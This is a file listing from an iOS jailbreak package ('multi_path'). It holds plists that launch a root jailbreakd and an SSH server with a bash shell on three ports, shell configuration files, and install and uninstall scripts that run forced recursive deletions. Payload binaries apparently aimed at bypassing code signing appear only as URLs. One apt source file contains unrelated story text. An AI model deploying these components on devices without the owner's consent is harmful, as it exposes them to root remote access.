/multi_path/iosbinpack64/LaunchDaemons/jailbreakd.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Label
6 | jailbreakd
7 | Program
8 | REPLACE_ME/bin/jailbreakd
9 | EnvironmentVariables
10 |
11 | KernelBase
12 | 0x746f6d6f68696d61
13 |
14 | UserName
15 | root
16 | RunAtLoad
17 |
18 | KeepAlive
19 |
20 | StandardErrorPath
21 | /var/log/jailbreakd-stderr.log
22 | StandardOutPath
23 | /var/log/jailbreakd-stdout.log
24 |
25 |
26 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/LaunchDaemons/testbin.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Label
6 | testbinary
7 | Program
8 | REPLACE_ME/../test
9 | ProgramArguments
10 |
11 | REPLACE_ME/../test
12 |
13 | RunAtLoad
14 |
15 | KeepAlive
16 |
17 | StandardOutPath
18 | /var/log/testbin.log
19 |
20 |
21 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/amfidebilitate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/amfidebilitate
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/bash:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/bash
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/cat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/cat
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/chmod:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/chmod
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/cp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/cp
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/date:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/date
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/dd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/dd
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/hostname:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/hostname
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/jailbreakd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/jailbreakd
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/jbclient:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/jbclient
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/kill:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/kill
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/launchctl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/launchctl
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/launchctl_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/launchctl_
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/ln:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/ln
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/ls:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/ls
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/mkdir:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/mkdir
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/mv:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/mv
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/pwd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/pwd
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/rm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/rm
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/rmdir:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/rmdir
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/rootme:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/rootme
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/sh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/sh
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/sleep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/sleep
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/stty:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/stty
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/sync:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/sync
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/zsh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/zsh
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/default.ent:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | platform-application
5 |
6 | com.apple.private.security.container-required
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/dropbear.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Label
6 | Dropbear
7 | Program
8 | REPLACE_ME/usr/local/bin/dropbear
9 | ProgramArguments
10 |
11 | REPLACE_ME/usr/local/bin/dropbear
12 | -R
13 | --shell
14 | REPLACE_ME/bin/bash
15 | -E
16 | -p
17 | 22
18 | -p
19 | 2222
20 | -p
21 | 4242
22 |
23 | RunAtLoad
24 |
25 | KeepAlive
26 |
27 | StandardOutPath
28 | /var/log/dropbear.log
29 | StandardErrorPath
30 | /var/log/dropbear_error.log
31 |
32 |
33 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/alternatives/README:
--------------------------------------------------------------------------------
1 | Please read the update-alternatives(8) man page for information on this
2 | directory and its contents.
3 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/sources.list.d/saurik.list:
--------------------------------------------------------------------------------
1 | # DO NOT EDIT | This is the story of a time long ago, A time of myth and legend, when the Earth was still young.
2 | # The ancient gods were petty and cruel, and they plagued mankind with suffering and besieged them with terrors.
3 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/bigboss.gpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/bigboss.gpg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/modmyi.gpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/modmyi.gpg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/saurik.gpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/saurik.gpg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/zodttd.gpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/zodttd.gpg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/motd:
--------------------------------------------------------------------------------
1 | cEnjoy SSH! ~@Jakeashacks
2 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/profile:
--------------------------------------------------------------------------------
# Login environment for the binary pack. REPLACE_ME is presumably
# substituted with the pack's install prefix when it is deployed
# (the same placeholder is used by dropbear.plist).
#
# Search order: the stock system directories come first, the pack's
# directories last. A stock binary of the same name therefore shadows
# the bundled copy; move the REPLACE_ME entries to the front if the
# bundled tools must take precedence.
PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/bin/X11:/usr/games:REPLACE_ME/usr/local/sbin:REPLACE_ME/usr/local/bin:REPLACE_ME/usr/sbin:REPLACE_ME/usr/bin:REPLACE_ME/sbin:REPLACE_ME/bin'
export PATH

# bash prompt escapes: \h host, \w cwd, \u user, \$ is '#' for root, '$' otherwise.
PS1='\h:\w \u\$ '
export PS1

# Hands the session to the bundled bash as a child process (not exec),
# so whatever sourced this file resumes when that shell exits.
# NOTE(review): a non-interactive session that sources this file would
# sit on the interactive shell; guard this line with a tty check
# (`[ -t 0 ]`) if the file is ever read outside a login.
REPLACE_ME/bin/bash
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/zshrc:
--------------------------------------------------------------------------------
#
# /etc/zshrc is sourced in interactive shells. It
# should contain commands to set up aliases, functions,
# options, key bindings, etc.
#
# Installed to /etc/zshrc by makeMeAtHome.sh. Most of this file is a
# generic Linux/macOS zsh config carried over as-is; a few entries
# (GNU ls flags, coreutils names, a macOS SDK manpath, a bash-only
# PROMPT_COMMAND) do not apply on the device and are flagged below.
#

# Report logins/logouts of every user in this shell - useful on a device
# that exposes an SSH daemon, since other sessions become visible.
watch=(all)

# /jb entries are appended, so the stock system directories keep
# precedence over the pack's binaries. /jb/bin is listed twice (harmless).
export PATH=$PATH:/jb/usr/bin:/jb/bin:/jb/bin:/jb/sbin:/jb/usr/sbin:/usr/local/bin


# Print a personal to-do file from $HOME, if one exists.
if [ -f ~/2.DO ]; then
cat ~/2.DO
fi
# Group-writable default (002) only for non-system users (uid > 14) whose
# primary group is named after them; everyone else, including root, gets 022.
if [ `id -gn` = `id -un` -a `id -u` -gt 14 ]; then
umask 002
else
umask 022
fi

# Set up aliases
alias mv='nocorrect mv' # no spelling correction on mv
alias cp='nocorrect cp' # no spelling correction on cp
alias df='df -h' # More human readable
alias mkdir='nocorrect mkdir' # no spelling correction on mkdir
alias more='less'
alias ~='cd ~'
# --color=auto is a GNU grep option; whether the pack's grep accepts it
# is not established here - TODO confirm against /jb/usr/bin/grep.
alias grep='grep --color=auto' # Colors on Grep


# Shell functions
# NOTE(review): $1=$2 is unquoted, so a value containing whitespace is
# word-split before export; `export "$1=$2"` would be the safe form.
setenv() { export $1=$2 } # csh compatibility
# Johnny's opts...
setopt correct
setopt correct_all
# nohup: background jobs are not sent SIGHUP when the shell exits.
setopt nohup
#set correct=cmd

# Some environment variables
# $HOME/bin goes last, so nothing placed there shadows a system command.
path=($path $HOME/bin)
export USER=`id -un`
export LOGNAME=$USER
export HOSTNAME=`uname -n`
# Linux mail-spool path; presumably absent on the device (carried over).
export MAIL=/var/spool/mail/$USER



# Set prompts
#PROMPT=%b%S"$USER@%m %{[33m%}(%~) %#%s%B" # default prompt
#RPROMPT="%B%T%b" # prompt for right side of screen
#SPROMPT='You meant %r, Right? '


#

# %{...%} brackets mark zero-width escape sequences for prompt-width
# accounting. NOTE(review): the byte before each '[34m' / '[0m' / '[32m'
# is presumably a raw ESC that does not survive display; if it is
# genuinely missing from the file, the prompt prints the literal text
# instead of colouring it.
RPROMPT="%B%{[34m%}%T%{[0m%}%b"
PROMPT=%b%S"$USER@%m %{[32m%}(%~) %#%s%B" # default prompt

#
# below works, but if no zsh files are in /etc/profile.d it complains
# every time zsh is run. Commenting out for now.
#
# run other components
#for i in /etc/profile.d/*.zsh
#do
# source $i
#done

# bindkey -v # vi key bindings
bindkey -e # emacs key bindings
bindkey ' ' magic-space # also do history expansion on space

#------------------------------------------------------------------------
# Define LINUX Color Styles Here!
#------------------------------------------------------------------------

# GNU dircolors format (type=attrs;fg pairs, glob patterns for file kinds).
LS_COLORS="no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:\
cd=40;33;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:\
*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:\
*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:\
*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.README=05;1:*.DO=05;1:*.avi=00;32:*.mp3=00;33:"
export LS_COLORS

# --color/-T are GNU ls options; CLICOLOR is the BSD ls equivalent.
# Both are set; which one the pack's ls honours is not established here.
LS_OPTIONS="--color=tty -F -T 0"
export LS_OPTIONS
export CLICOLOR=1
# dir/vdir/vim are not part of the visible pack listing - TODO confirm
# they exist, otherwise these aliases fail with "command not found".
alias d=dir
alias v=vdir
alias vi=vim

# NOTE(review): PROMPT_COMMAND is a bash variable; zsh does not run it.
# The zsh equivalent of this terminal-title update is a precmd function.
PROMPT_COMMAND='echo -ne "\033]0;${USER}@${HOSTNAME}: ${PWD}\007"'

# The SDK path is a macOS host leftover; presumably absent on the device.
export MANPATH=/usr/share/man:/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk/usr/share/man

# Colourised man/less output (termcap attribute overrides).
export LESS_TERMCAP_mb=$'\E[01;31m'
export LESS_TERMCAP_md=$'\E[01;31m'
export LESS_TERMCAP_me=$'\E[0m'
export LESS_TERMCAP_se=$'\E[0m'
export LESS_TERMCAP_so=$'\E[01;44;33m'
export LESS_TERMCAP_ue=$'\E[0m'
export LESS_TERMCAP_us=$'\E[01;32m'
# -r passes raw control characters through so the colours above render.
export LESS=-r
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/makeMeAtHome.sh:
--------------------------------------------------------------------------------
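#
# Sets up J's favorite environment
#
# These are perfectly safe and reversible
#
# Relocates the bundled scp, zsh (plus its support files), the terminfo
# database and the J-tools from /jb into the stock system directories.
# removeMe.sh is the inverse. Presumably needs a writable root
# filesystem; mv errors for already-populated targets are expected
# (see the message at the end).
#

# Resolve mv/mkdir from the /jb tree only (echo is a builtin).
# The trailing ':' that used to end this value was an empty PATH entry,
# which the shell searches as the current directory; it is dropped so a
# file in $PWD can never be picked up in place of a command.
export PATH=/jb/usr/bin:/jb/bin:/jb/sbin:/jb/usr/sbin:/jb/usr/local/bin


echo Enabling SCP
mv /jb/usr/bin/scp /usr/bin/scp

echo Setting up ZSH Support files
mkdir -p /usr/local/lib/zsh/5.0.8/zsh
mv /jb/usr/local/lib/zsh/5.0.8/zsh/* /usr/local/lib/zsh/5.0.8/zsh
mv /jb/bin/zsh /bin
mv /jb/etc/zshrc /etc

echo Setting up Terminfo Database
mkdir -p /usr/share/terminfo
mv /jb/usr/share/terminfo/* /usr/share/terminfo/

echo Moving J-tools to /usr/local/bin
mkdir -p /usr/local/bin
mv /jb/usr/local/bin/* /usr/local/bin


echo It\'s fine if you saw errors that some directories were not empty.
echo now feel free to run \'zsh\' instead of bash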
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/profile:
--------------------------------------------------------------------------------
# Minimal interactive defaults: a prompt showing user, host and cwd, and
# a PATH limited to the stock system directories (no /jb entries).
# PS1 is single-quoted on purpose so $USER/$HOST/$PWD are expanded by
# the shell each time the prompt is drawn, not once here. The trailing
# '#' is cosmetic and does not by itself indicate a root shell.
PS1='$USER@$HOST ($PWD)# '
export PS1

PATH=/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/removeMe.sh:
--------------------------------------------------------------------------------
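# Undoes makeMeAtHome.sh: removes the relocated tools, Cydia, the hosts
# override and finally the /jb tree itself. Every command is called by
# absolute /jb path because PATH is not set here; /jb is deleted last,
# so only shell builtins (echo) run after that point.
echo Removing Message-of-the-Day
/jb/bin/rm /etc/motd
echo Removing /.cydia_no_stash
/jb/bin/rm /.cydia_no_stash
echo Removing Cydia
/jb/bin/rm -fR /Applications/Cydia.app/
echo Removing terminfo database
/jb/bin/rm -fR /usr/share/terminfo
echo Removing ZSH support files
/jb/bin/rm -fR /usr/local/lib/zsh
/jb/bin/rm /bin/zsh
/jb/bin/rm /etc/zshrc

echo Removing J-tools from /usr/local/bin
/jb/bin/rm -fR /usr/local/bin

echo Removing /usr/bin/scp as well. This means you can\'t use WinSCP, etc anymore.
/jb/bin/rm /usr/bin/scp

echo Reenabling mesu.apple.com \(for auto-updates and/or stock app downloads\)
# The pack ships grep under usr/bin, not bin. The original called
# /jb/bin/grep: that path does not exist, the pipeline failed, the
# redirect had already created an empty /tmp/hosts.tmp, and the mv then
# replaced /etc/hosts with an empty file. Read the file directly and only
# install the result when grep exited 0 (lines kept) or 1 (nothing left
# to keep); exit 2 means grep itself failed.
/jb/usr/bin/grep -v mesu /etc/hosts > /tmp/hosts.tmp
rc=$?
if [ "$rc" -le 1 ]; then
    /jb/bin/mv /tmp/hosts.tmp /etc/hosts
    # mv keeps the temp file's umask-derived mode; hosts must stay world-readable.
    /jb/bin/chmod 644 /etc/hosts
else
    echo Could not filter /etc/hosts, leaving it unchanged.
    /jb/bin/rm -f /tmp/hosts.tmp
fi

echo Removing /jb
/jb/bin/rm -fR /jb

echo Sad to see you go.. but - That\'s it - no traces should be left.
echo You cannot do anything else in the shell since the binaries have all been removed.
echo Reboot your device to stop dropbear.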
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/dmesg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/dmesg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/ifconfig:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/ifconfig
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/kextunload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/kextunload
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/md5:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/md5
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/mknod:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/mknod
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/ping:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/ping
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/shutdown:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/shutdown
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/umount:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/umount
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/test:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/test
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/amfid_payload.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/amfid_payload.dylib
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/arch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/arch
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/chflags:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/chflags
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/clear:
--------------------------------------------------------------------------------
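# Clears the terminal: ESC[1;1H homes the cursor to row 1, column 1 and
# ESC[2J erases the whole screen. The octal escape \033 is used instead
# of \e, which POSIX printf does not define, so this works with any
# printf implementation (builtin or the pack's /usr/bin/printf).
# There is no #! line: the file runs only when started through a shell,
# or when the caller's shell falls back to sh for a script without one.
printf "\033[1;1H\033[2J"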
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/cut:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/cut
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/du:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/du
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/false:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/false
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/find:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/find
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/fs_usage:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/fs_usage
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/grep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/grep
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/gunzip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/gunzip
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/gzip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/gzip
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/head:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/head
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/hexdump:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/hexdump
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/hostinfo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/hostinfo
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/id:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/id
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/inject_criticald:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/inject_criticald
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/killall:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/killall
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/less:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/less
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/login:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/login
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/lsmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/lsmp
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/more:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/more
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/nano:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/nano
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/nohup:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/nohup
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/passwd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/passwd
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/plconvert:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/plconvert
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/printf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/printf
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/renice:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/renice
